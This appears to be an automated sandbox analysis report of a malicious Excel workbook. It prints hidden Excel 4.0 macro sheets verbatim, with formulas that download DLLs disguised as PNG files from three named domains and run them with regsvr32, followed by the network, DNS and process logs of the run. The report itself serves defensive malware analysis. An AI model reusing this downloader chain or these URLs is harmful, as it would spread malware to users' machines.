Data ASCII: | @ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PVVEBZ4False0Falsepre9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)26,7,=GOTO(PDGLGF!D3) |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PDGLGF4False0Falsepost4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)13,3,=EXEC("regsvr32 C:\Uduw\ehxw3.dll")15,3,=RETURN() |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PDGLGF4False0Falsepre4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Btd3False0Falsepost12,3,=CHAR(Fhgyk!L52) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Btd3False0Falsepre12,3,=CHAR(Fhgyk!L52) |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PVVEBZ4False0Falsepost9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)12,7,=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)14,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)16,7,=EXEC("regsvr32 C:\Uduw\ehxw1.dll")18,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)20,7,=EXEC("regsvr32 C:\Uduw\ehxw2.dll")22,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)26,7,=GOTO(PDGLGF!D3) |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2022-04-13T08:02:18Z |
Creating Application: | |
Security: | 0 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
General | |
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 77 |
Entropy: | 2.95477953387 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x1Ole |
File Type: | data |
Stream Size: | 101 |
Entropy: | 3.4182168343 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . F . . . . ! . 7 . . . S h e e t ( 2 ) ! . . . . . . 1 . S . h . e . e . t . . ( . 2 . ) . ! . . . 1 . J . 5 . : . B . . 1 . |
Data Raw: | 01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 55 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 37 00 00 00 53 68 65 65 74 20 28 32 29 21 ce e1 fa e5 ea f2 20 31 00 53 00 68 00 65 00 65 00 74 00 20 00 28 00 32 00 29 00 21 00 1e 04 31 04 4a 04 35 04 3a 04 42 04 20 00 31 00 |
General | |
Stream Path: | \x1Ole10Native |
File Type: | data |
Stream Size: | 3072068 |
Entropy: | 2.9569834776 |
Base64 Encoded: | True |
Data ASCII: | @ . . . B M 6 . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 40 e0 2e 00 42 4d 36 e0 2e 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 20 03 00 00 01 00 18 00 00 00 00 00 00 e0 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PVVEBZ4False0Falsepre9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)26,7,=GOTO(PDGLGF!D3) |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PDGLGF4False0Falsepost4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16)13,3,=EXEC("regsvr32 C:\Uduw\ehxw3.dll")15,3,=RETURN() |
Name: | PDGLGF |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PDGLGF4False0Falsepre4,3,=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw3.dll")",D14)=FORMULA("=RETURN()",D16) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Btd3False0Falsepost12,3,=CHAR(Fhgyk!L52) |
Name: | Btd |
Type: | 3 |
Final: | False |
Visible: | False |
Protected: | False |
Btd3False0Falsepre12,3,=CHAR(Fhgyk!L52) |
Name: | PVVEBZ |
Type: | 4 |
Final: | False |
Visible: | False |
Protected: | False |
PVVEBZ4False0Falsepost9,7,=FORMULA()=FORMULA()=FORMULA()=FORMULA("=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)",H13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)",H15)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw1.dll")",H17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)",H19)=FORMULA("=EXEC("regsvr32 C:\Uduw\ehxw2.dll")",H21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)",H23)12,7,=CALL("Kernel32","CreateDirectoryA","JCJ","C:\Uduw",0)14,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://maramaabroo.com/XGLCPZf6et/Cvnhfn.png","C:\Uduw\ehxw1.dll",0,0)16,7,=EXEC("regsvr32 C:\Uduw\ehxw1.dll")18,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://natalespatagonia.cl/w2X7dAxp/Cvnhfn.png","C:\Uduw\ehxw2.dll",0,0)20,7,=EXEC("regsvr32 C:\Uduw\ehxw2.dll")22,7,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camarajocaclaudino.pb.gov.br/5jajRnhLV0/Cvnhfn.png","C:\Uduw\ehxw3.dll",0,0)26,7,=GOTO(PDGLGF!D3) |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 13, 2022 16:08:25.683748007 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.683832884 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.683964014 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.694847107 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.694915056 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.802860975 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.803271055 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.823371887 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:25.823404074 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.823813915 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:25.823899984 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.089989901 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.134196043 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.638818979 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.638957024 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.639058113 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639100075 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639482021 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639522076 CEST | 443 | 49173 | 31.22.4.117 | 192.168.2.22 |
Apr 13, 2022 16:08:26.639554024 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:26.639612913 CEST | 49173 | 443 | 192.168.2.22 | 31.22.4.117 |
Apr 13, 2022 16:08:27.268148899 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.268199921 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.268280983 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.269045115 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.269062042 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.567006111 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.567137003 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.574062109 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.574089050 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.574388027 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:27.574462891 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.591192007 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:27.634186029 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.182924032 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.183068037 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:29.183773041 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.183835030 CEST | 443 | 49174 | 192.185.17.132 | 192.168.2.22 |
Apr 13, 2022 16:08:29.184253931 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:08:29.661552906 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.661657095 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.661747932 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.662199974 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.662235022 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.949445963 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.949579954 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.964890003 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.964926958 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.965326071 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:29.965420008 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:29.972403049 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:30.014192104 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.146747112 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.146872044 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.146892071 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.146950960 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.195751905 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.195811987 CEST | 443 | 49175 | 162.241.62.76 | 192.168.2.22 |
Apr 13, 2022 16:08:31.195836067 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:08:31.195902109 CEST | 49175 | 443 | 192.168.2.22 | 162.241.62.76 |
Apr 13, 2022 16:10:25.538781881 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Apr 13, 2022 16:10:25.539721966 CEST | 49174 | 443 | 192.168.2.22 | 192.185.17.132 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 13, 2022 16:08:25.633239031 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 13, 2022 16:08:25.672044039 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Apr 13, 2022 16:08:27.059580088 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 13, 2022 16:08:27.264260054 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Apr 13, 2022 16:08:29.637124062 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 13, 2022 16:08:29.654807091 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 13, 2022 16:08:25.633239031 CEST | 192.168.2.22 | 8.8.8.8 | 0xe763 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 13, 2022 16:08:27.059580088 CEST | 192.168.2.22 | 8.8.8.8 | 0x4650 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 13, 2022 16:08:29.637124062 CEST | 192.168.2.22 | 8.8.8.8 | 0xeef8 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 13, 2022 16:08:25.672044039 CEST | 8.8.8.8 | 192.168.2.22 | 0xe763 | No error (0) | 31.22.4.117 | A (IP address) | IN (0x0001) | ||
Apr 13, 2022 16:08:27.264260054 CEST | 8.8.8.8 | 192.168.2.22 | 0x4650 | No error (0) | 192.185.17.132 | A (IP address) | IN (0x0001) | ||
Apr 13, 2022 16:08:29.654807091 CEST | 8.8.8.8 | 192.168.2.22 | 0xeef8 | No error (0) | 162.241.62.76 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49173 | 31.22.4.117 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-04-13 14:08:26 UTC | 0 | OUT | |
2022-04-13 14:08:26 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49174 | 192.185.17.132 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-04-13 14:08:27 UTC | 0 | OUT | |
2022-04-13 14:08:29 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49175 | 162.241.62.76 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-04-13 14:08:29 UTC | 1 | OUT | |
2022-04-13 14:08:31 UTC | 1 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 16:08:16 |
Start date: | 13/04/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f660000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 3 |
Start time: | 16:08:26 |
Start date: | 13/04/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff460000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 6 |
Start time: | 16:08:29 |
Start date: | 13/04/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff460000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 7 |
Start time: | 16:08:31 |
Start date: | 13/04/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff460000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |